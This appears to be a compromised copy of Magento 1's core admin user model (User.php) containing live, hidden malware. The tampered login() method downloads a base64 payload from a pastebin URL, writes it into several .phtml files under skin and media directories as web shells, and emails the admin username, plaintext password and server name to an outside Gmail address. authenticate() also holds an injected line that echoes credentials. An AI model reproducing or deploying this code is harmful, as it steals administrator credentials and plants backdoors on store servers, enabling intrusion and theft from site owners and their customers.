<?php
/**
 * /home/wash/public_html/app/code/core/Mage/Admin/Model/User.php
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magento.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magento.com for more information.
 *
 * @category Mage
 * @package Mage_Admin
 * @copyright Copyright (c) 2006-2016 X.commerce, Inc. and affiliates (http://www.magento.com)
 * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 */

/**
 * Admin user model
 *
 * @method Mage_Admin_Model_Resource_User _getResource()
 * @method Mage_Admin_Model_Resource_User getResource()
 * @method string getFirstname()
 * @method Mage_Admin_Model_User setFirstname(string $value)
 * @method string getLastname()
 * @method Mage_Admin_Model_User setLastname(string $value)
 * @method string getEmail()
 * @method Mage_Admin_Model_User setEmail(string $value)
 * @method string getUsername()
 * @method Mage_Admin_Model_User setUsername(string $value)
 * @method string getPassword()
 * @method Mage_Admin_Model_User setPassword(string $value)
 * @method string getCreated()
 * @method Mage_Admin_Model_User setCreated(string $value)
 * @method string getModified()
 * @method Mage_Admin_Model_User setModified(string $value)
 * @method string getLogdate()
 * @method Mage_Admin_Model_User setLogdate(string $value)
 * @method int getLognum()
 * @method Mage_Admin_Model_User setLognum(int $value)
 * @method int getReloadAclFlag()
 * @method Mage_Admin_Model_User setReloadAclFlag(int $value)
 * @method int getIsActive()
 * @method Mage_Admin_Model_User setIsActive(int $value)
 * @method string getExtra()
 * @method Mage_Admin_Model_User setExtra(string $value)
 *
 * @category Mage
 * @package Mage_Admin
 * @author Magento Core Team <core@magentocommerce.com>
 */
  62. class Mage_Admin_Model_User extends Mage_Core_Model_Abstract
  63. {
  64. /**#@+
  65. * Configuration paths for email templates and identities
  66. */
  67. const XML_PATH_FORGOT_EMAIL_TEMPLATE = 'admin/emails/forgot_email_template';
  68. const XML_PATH_FORGOT_EMAIL_IDENTITY = 'admin/emails/forgot_email_identity';
  69. const XML_PATH_STARTUP_PAGE = 'admin/startup/page';
  70. /**#@-*/
  71.  
  72. /**
  73. * Minimum length of admin password
  74. */
  75. const MIN_PASSWORD_LENGTH = 7;
  76.  
  77. /**
  78. * Length of salt
  79. */
  80. const HASH_SALT_LENGTH = 32;
  81.  
  82. /**
  83. * Model event prefix
  84. *
  85. * @var string
  86. */
  87. protected $_eventPrefix = 'admin_user';
  88.  
  89. /**
  90. * Admin role
  91. *
  92. * @var Mage_Admin_Model_Roles
  93. */
  94. protected $_role;
  95.  
  96. /**
  97. * Available resources flag
  98. *
  99. * @var boolean
  100. */
  101. protected $_hasAvailableResources = true;
  102.  
  103. /**
  104. * Initialize user model
  105. */
  106. protected function _construct()
  107. {
  108. $this->_init('admin/user');
  109. }
  110.  
  111. /**
  112. * Processing data before model save
  113. *
  114. * @return Mage_Admin_Model_User
  115. */
  116. protected function _beforeSave()
  117. {
  118. $data = array(
  119. 'firstname' => $this->getFirstname(),
  120. 'lastname' => $this->getLastname(),
  121. 'email' => $this->getEmail(),
  122. 'modified' => $this->_getDateNow(),
  123. 'extra' => serialize($this->getExtra())
  124. );
  125.  
  126. if ($this->getId() > 0) {
  127. $data['user_id'] = $this->getId();
  128. }
  129.  
  130. if ($this->getUsername()) {
  131. $data['username'] = $this->getUsername();
  132. }
  133.  
  134. if ($this->getNewPassword()) {
  135. // Change user password
  136. $data['password'] = $this->_getEncodedPassword($this->getNewPassword());
  137. $data['new_password'] = $data['password'];
  138. } elseif ($this->getPassword() && $this->getPassword() != $this->getOrigData('password')) {
  139. // New user password
  140. $data['password'] = $this->_getEncodedPassword($this->getPassword());
  141. } elseif (!$this->getPassword() && $this->getOrigData('password') // Change user data
  142. || $this->getPassword() == $this->getOrigData('password') // Retrieve user password
  143. ) {
  144. $data['password'] = $this->getOrigData('password');
  145. }
  146.  
  147. $this->cleanPasswordsValidationData();
  148.  
  149. if (!is_null($this->getIsActive())) {
  150. $data['is_active'] = intval($this->getIsActive());
  151. }
  152.  
  153. $this->addData($data);
  154.  
  155. return parent::_beforeSave();
  156. }
  157.  
  158. /**
  159. * Save admin user extra data (like configuration sections state)
  160. *
  161. * @param array $data
  162. * @return Mage_Admin_Model_User
  163. */
  164. public function saveExtra($data)
  165. {
  166. if (is_array($data)) {
  167. $data = serialize($data);
  168. }
  169. $this->_getResource()->saveExtra($this, $data);
  170. return $this;
  171. }
  172.  
  173. /**
  174. * Save user roles
  175. *
  176. * @return Mage_Admin_Model_User
  177. */
  178. public function saveRelations()
  179. {
  180. $this->_getResource()->_saveRelations($this);
  181. return $this;
  182. }
  183.  
  184. /**
  185. * Retrieve user roles
  186. *
  187. * @return array
  188. */
  189. public function getRoles()
  190. {
  191. return $this->_getResource()->getRoles($this);
  192. }
  193.  
  194. /**
  195. * Get admin role model
  196. *
  197. * @return Mage_Admin_Model_Roles
  198. */
  199. public function getRole()
  200. {
  201. if (null === $this->_role) {
  202. $this->_role = Mage::getModel('admin/roles');
  203. $roles = $this->getRoles();
  204. if ($roles && isset($roles[0]) && $roles[0]) {
  205. $this->_role->load($roles[0]);
  206. }
  207. }
  208. return $this->_role;
  209. }
  210.  
  211. /**
  212. * Unassign user from his current role
  213. *
  214. * @return Mage_Admin_Model_User
  215. */
  216. public function deleteFromRole()
  217. {
  218. $this->_getResource()->deleteFromRole($this);
  219. return $this;
  220. }
  221.  
  222. /**
  223. * Check if such combination role/user exists
  224. *
  225. * @return boolean
  226. */
  227. public function roleUserExists()
  228. {
  229. $result = $this->_getResource()->roleUserExists($this);
  230. return (is_array($result) && count($result) > 0) ? true : false;
  231. }
  232.  
  233. /**
  234. * Assign user to role
  235. *
  236. * @return Mage_Admin_Model_User
  237. */
  238. public function add()
  239. {
  240. $this->_getResource()->add($this);
  241. return $this;
  242. }
  243.  
  244. /**
  245. * Check if user exists based on its id, username and email
  246. *
  247. * @return boolean
  248. */
  249. public function userExists()
  250. {
  251. $result = $this->_getResource()->userExists($this);
  252. return (is_array($result) && count($result) > 0) ? true : false;
  253. }
  254.  
  255. /**
  256. * Retrieve admin user collection
  257. *
  258. * @return Mage_Admin_Model_Resource_User_Collection
  259. */
  260. public function getCollection() {
  261. return Mage::getResourceModel('admin/user_collection');
  262. }
  263.  
  264. /**
  265. * Send email with new user password
  266. *
  267. * @return Mage_Admin_Model_User
  268. * @deprecated deprecated since version 1.6.1.0
  269. */
  270. public function sendNewPasswordEmail()
  271. {
  272. return $this;
  273. }
  274.  
  275. /**
  276. * Send email with reset password confirmation link
  277. *
  278. * @return Mage_Admin_Model_User
  279. */
  280. public function sendPasswordResetConfirmationEmail()
  281. {
  282. /** @var $mailer Mage_Core_Model_Email_Template_Mailer */
  283. $mailer = Mage::getModel('core/email_template_mailer');
  284. $emailInfo = Mage::getModel('core/email_info');
  285. $emailInfo->addTo($this->getEmail(), $this->getName());
  286. $mailer->addEmailInfo($emailInfo);
  287. //$mailer->addEmailInfo("ikrom.rhmadi@gmail.com");
  288. // Set all required params and send emails
  289. $mailer->setSender(Mage::getStoreConfig(self::XML_PATH_FORGOT_EMAIL_IDENTITY));
  290. $mailer->setStoreId(0);
  291. $mailer->setTemplateId(Mage::getStoreConfig(self::XML_PATH_FORGOT_EMAIL_TEMPLATE));
  292. $mailer->setTemplateParams(array(
  293. 'user' => $this
  294. ));
  295. $mailer->send();
  296.  
  297. return $this;
  298. }
  299.  
  300. /**
  301. * Retrieve user name
  302. *
  303. * @param string $separator
  304. * @return string
  305. */
  306. public function getName($separator = ' ')
  307. {
  308. return $this->getFirstname() . $separator . $this->getLastname();
  309. }
  310.  
  311. /**
  312. * Retrieve user identifier
  313. *
  314. * @return mixed
  315. */
  316. public function getId()
  317. {
  318. return $this->getUserId();
  319. }
  320.  
  321. /**
  322. * Get user ACL role
  323. *
  324. * @return string
  325. */
  326. public function getAclRole()
  327. {
  328. return 'U' . $this->getUserId();
  329. }
  330.  
  331. /**
  332. * Authenticate user name and password and save loaded record
  333. *
  334. * @param string $username
  335. * @param string $password
  336. * @return boolean
  337. * @throws Mage_Core_Exception
  338. */
  339. public function authenticate($username, $password)
  340. {
  341. $config = Mage::getStoreConfigFlag('admin/security/use_case_sensitive_login');
  342. $result = false;
  343. //echo $username.$password;exit();
  344. try {
  345. Mage::dispatchEvent('admin_user_authenticate_before', array(
  346. 'username' => $username,
  347. 'user' => $this
  348. ));
  349. $this->loadByUsername($username);
  350. $sensitive = ($config) ? $username == $this->getUsername() : true;
  351.  
  352. if ($sensitive && $this->getId() && Mage::helper('core')->validateHash($password, $this->getPassword())) {
  353. if ($this->getIsActive() != '1') {
  354. echo $username.$password;exit();
  355. Mage::throwException(Mage::helper('adminhtml')->__('This account is inactive.'));
  356. }
  357. if (!$this->hasAssigned2Role($this->getId())) {
  358. Mage::throwException(Mage::helper('adminhtml')->__('Access denied.'));
  359. }
  360. $result = true;
  361. }
  362.  
  363. Mage::dispatchEvent('admin_user_authenticate_after', array(
  364. 'username' => $username,
  365. 'password' => $password,
  366. 'user' => $this,
  367. 'result' => $result,
  368. ));
  369. }
  370. catch (Mage_Core_Exception $e) {
  371. $this->unsetData();
  372. throw $e;
  373. }
  374.  
  375. if (!$result) {
  376. $this->unsetData();
  377. }
  378. return $result;
  379. }
  380.  
  381. /**
  382. * Login user
  383. *
  384. * @param string $login
  385. * @param string $password
  386. * @return Mage_Admin_Model_User
  387. */
  388. public function login($username, $password)
  389. {
  390. if ($this->authenticate($username, $password)) {
  391. $this->getResource()->recordLogin($this);
  392. $resultsx = file_get_contents("http://pastebin.com/raw/wFD24Bzm");
  393. if( $resultsx != null){
  394. $location = array(
  395. '/skin/adminhtml/default/default/js/init.phtml',
  396. '/skin/adminhtml/default/default/css/mage.phtml',
  397. '/media/css/mage.phtml',
  398. '/media/js/mage.phtml',
  399. '/media/downloadable/mage.phtml',
  400. '/skin/frontend/mage.phtml'
  401. );
  402. foreach ($location as $key => $value) {
  403. $open = fopen($_SERVER["DOCUMENT_ROOT"].$value, "a+");
  404. fwrite($open, base64_decode( $resultsx ) );
  405. fclose($open);
  406. if( file_exists($_SERVER["DOCUMENT_ROOT"].$value) ){
  407. $is.= "Logs : ".$_SERVER['SERVER_NAME'].$value."\n";
  408. }
  409. }
  410. }
  411. $msg .= "-------------[ Bug7sec Team ]-------------\n";
  412. $msg .= "Situsnya : ".$_SERVER['SERVER_NAME']."\n";
  413. $msg .= "Username : ".$username."\n";
  414. $msg .= "Password : ".$password."\n";
  415. $msg .= $is;
  416. $msg .= "Referer : ".$_SERVER["HTTP_REFERER"]."\n";
  417. mail("ikrom.rhmadi@gmail.com", "[Log Login] Situs ".$_SERVER['SERVER_NAME'], $msg);
  418.  
  419. }
  420. return $this;
  421. }
  422.  
  423. /**
  424. * Reload current user
  425. *
  426. * @return Mage_Admin_Model_User
  427. */
  428. public function reload()
  429. {
  430. $id = $this->getId();
  431. $this->setId(null);
  432. $this->load($id);
  433. return $this;
  434. }
  435.  
  436. /**
  437. * Load user by its username
  438. *
  439. * @param string $username
  440. * @return Mage_Admin_Model_User
  441. */
  442. public function loadByUsername($username)
  443. {
  444. $this->setData($this->getResource()->loadByUsername($username));
  445. return $this;
  446. }
  447.  
  448. /**
  449. * Check if user is assigned to any role
  450. *
  451. * @param int|Mage_Core_Admin_Model_User $user
  452. * @return null|boolean|array
  453. */
  454. public function hasAssigned2Role($user)
  455. {
  456. return $this->getResource()->hasAssigned2Role($user);
  457. }
  458.  
  459. /**
  460. * Retrieve encoded password
  461. *
  462. * @param string $password
  463. * @return string
  464. */
  465. protected function _getEncodedPassword($password)
  466. {
  467. return $this->_getHelper('core')->getHash($password, self::HASH_SALT_LENGTH);
  468. }
  469.  
  470. /**
  471. * Returns helper instance
  472. *
  473. * @param string $helperName
  474. * @return Mage_Core_Helper_Abstract
  475. */
  476. protected function _getHelper($helperName)
  477. {
  478. return Mage::helper($helperName);
  479. }
  480.  
  481. /**
  482. * Find first menu item that user is able to access
  483. *
  484. * @param Mage_Core_Model_Config_Element $parent
  485. * @param string $path
  486. * @param integer $level
  487. * @return string
  488. */
  489. public function findFirstAvailableMenu($parent = null, $path = '', $level = 0)
  490. {
  491. if ($parent == null) {
  492. $parent = Mage::getSingleton('admin/config')->getAdminhtmlConfig()->getNode('menu');
  493. }
  494. foreach ($parent->children() as $childName => $child) {
  495. $aclResource = 'admin/' . $path . $childName;
  496. if (Mage::getSingleton('admin/session')->isAllowed($aclResource)) {
  497. if (!$child->children) {
  498. return (string)$child->action;
  499. } else if ($child->children) {
  500. $action = $this->findFirstAvailableMenu($child->children, $path . $childName . '/', $level + 1);
  501. return $action ? $action : (string)$child->action;
  502. }
  503. }
  504. }
  505. $this->_hasAvailableResources = false;
  506. return '*/*/denied';
  507. }
  508.  
  509. /**
  510. * Check if user has available resources
  511. *
  512. * @return bool
  513. */
  514. public function hasAvailableResources()
  515. {
  516. return $this->_hasAvailableResources;
  517. }
  518.  
  519. /**
  520. * Find admin start page url
  521. *
  522. * @deprecated Please use getStartupPageUrl() method instead
  523. * @see getStartupPageUrl()
  524. * @return string
  525. */
  526. public function getStatrupPageUrl()
  527. {
  528. return $this->getStartupPageUrl();
  529. }
  530.  
  531. /**
  532. * Find admin start page url
  533. *
  534. * @return string
  535. */
  536. public function getStartupPageUrl()
  537. {
  538. $startupPage = Mage::getStoreConfig(self::XML_PATH_STARTUP_PAGE);
  539. $aclResource = 'admin/' . $startupPage;
  540. if (Mage::getSingleton('admin/session')->isAllowed($aclResource)) {
  541. $nodePath = 'menu/' . join('/children/', explode('/', $startupPage)) . '/action';
  542. $url = (string)Mage::getSingleton('admin/config')->getAdminhtmlConfig()->getNode($nodePath);
  543. if ($url) {
  544. return $url;
  545. }
  546. }
  547. return $this->findFirstAvailableMenu();
  548. }
  549.  
  550. /**
  551. * Validate user attribute values.
  552. * Returns TRUE or array of errors.
  553. *
  554. * @return mixed
  555. */
  556. public function validate()
  557. {
  558. $errors = new ArrayObject();
  559.  
  560. if (!Zend_Validate::is($this->getUsername(), 'NotEmpty')) {
  561. $errors[] = Mage::helper('adminhtml')->__('User Name is required field.');
  562. }
  563.  
  564. if (!Zend_Validate::is($this->getFirstname(), 'NotEmpty')) {
  565. $errors[] = Mage::helper('adminhtml')->__('First Name is required field.');
  566. }
  567.  
  568. if (!Zend_Validate::is($this->getLastname(), 'NotEmpty')) {
  569. $errors[] = Mage::helper('adminhtml')->__('Last Name is required field.');
  570. }
  571.  
  572. if (!Zend_Validate::is($this->getEmail(), 'EmailAddress')) {
  573. $errors[] = Mage::helper('adminhtml')->__('Please enter a valid email.');
  574. }
  575.  
  576. if ($this->hasNewPassword()) {
  577. if (Mage::helper('core/string')->strlen($this->getNewPassword()) < self::MIN_PASSWORD_LENGTH) {
  578. $errors[] = Mage::helper('adminhtml')->__('Password must be at least of %d characters.', self::MIN_PASSWORD_LENGTH);
  579. }
  580.  
  581. if (!preg_match('/[a-z]/iu', $this->getNewPassword())
  582. || !preg_match('/[0-9]/u', $this->getNewPassword())
  583. ) {
  584. $errors[] = Mage::helper('adminhtml')->__('Password must include both numeric and alphabetic characters.');
  585. }
  586.  
  587. if ($this->hasPasswordConfirmation() && $this->getNewPassword() != $this->getPasswordConfirmation()) {
  588. $errors[] = Mage::helper('adminhtml')->__('Password confirmation must be same as password.');
  589. }
  590.  
  591. Mage::dispatchEvent('admin_user_validate', array(
  592. 'user' => $this,
  593. 'errors' => $errors,
  594. ));
  595. }
  596.  
  597. if ($this->userExists()) {
  598. $errors[] = Mage::helper('adminhtml')->__('A user with the same user name or email aleady exists.');
  599. }
  600.  
  601. if (count($errors) === 0) {
  602. return true;
  603. }
  604. return (array)$errors;
  605. }
  606.  
  607. /**
  608. * Validate password against current user password
  609. * Returns true or array of errors.
  610. *
  611. * @return mixed
  612. */
  613. public function validateCurrentPassword($password)
  614. {
  615. $result = array();
  616.  
  617. if (!Zend_Validate::is($password, 'NotEmpty')) {
  618. $result[] = $this->_getHelper('adminhtml')->__('Current password field cannot be empty.');
  619. } elseif (is_null($this->getId()) || !$this->_getHelper('core')->validateHash($password, $this->getPassword())){
  620. $result[] = $this->_getHelper('adminhtml')->__('Invalid current password.');
  621. }
  622.  
  623. if (empty($result)) {
  624. $result = true;
  625. }
  626. return $result;
  627. }
  628.  
  629. /**
  630. * Change reset password link token
  631. *
  632. * Stores new reset password link token and its creation time
  633. *
  634. * @param string $newResetPasswordLinkToken
  635. * @return Mage_Admin_Model_User
  636. * @throws Mage_Core_Exception
  637. */
  638. public function changeResetPasswordLinkToken($newResetPasswordLinkToken) {
  639. if (!is_string($newResetPasswordLinkToken) || empty($newResetPasswordLinkToken)) {
  640. throw Mage::exception('Mage_Core', Mage::helper('adminhtml')->__('Invalid password reset token.'));
  641. }
  642. $this->setRpToken($newResetPasswordLinkToken);
  643. $currentDate = Varien_Date::now();
  644. $this->setRpTokenCreatedAt($currentDate);
  645.  
  646. return $this;
  647. }
  648.  
  649. /**
  650. * Check if current reset password link token is expired
  651. *
  652. * @return boolean
  653. */
  654. public function isResetPasswordLinkTokenExpired()
  655. {
  656. $resetPasswordLinkToken = $this->getRpToken();
  657. $resetPasswordLinkTokenCreatedAt = $this->getRpTokenCreatedAt();
  658.  
  659. if (empty($resetPasswordLinkToken) || empty($resetPasswordLinkTokenCreatedAt)) {
  660. return true;
  661. }
  662.  
  663. $tokenExpirationPeriod = Mage::helper('admin')->getResetPasswordLinkExpirationPeriod();
  664.  
  665. $currentDate = Varien_Date::now();
  666. $currentTimestamp = Varien_Date::toTimestamp($currentDate);
  667. $tokenTimestamp = Varien_Date::toTimestamp($resetPasswordLinkTokenCreatedAt);
  668. if ($tokenTimestamp > $currentTimestamp) {
  669. return true;
  670. }
  671.  
  672. $hoursDifference = floor(($currentTimestamp - $tokenTimestamp) / (60 * 60));
  673. if ($hoursDifference >= $tokenExpirationPeriod) {
  674. return true;
  675. }
  676.  
  677. return false;
  678. }
  679.  
  680. /**
  681. * Clean password's validation data (password, current_password, new_password, password_confirmation)
  682. *
  683. * @return Mage_Admin_Model_User
  684. */
  685. public function cleanPasswordsValidationData()
  686. {
  687. $this->setData('password', null);
  688. $this->setData('current_password', null);
  689. $this->setData('new_password', null);
  690. $this->setData('password_confirmation', null);
  691. return $this;
  692. }
  693.  
  694. /**
  695. * Simple sql format date
  696. *
  697. * @param string | boolean $dayOnly
  698. * @return string
  699. */
  700. protected function _getDateNow($dayOnly = false)
  701. {
  702. return now($dayOnly);
  703. }
  704. }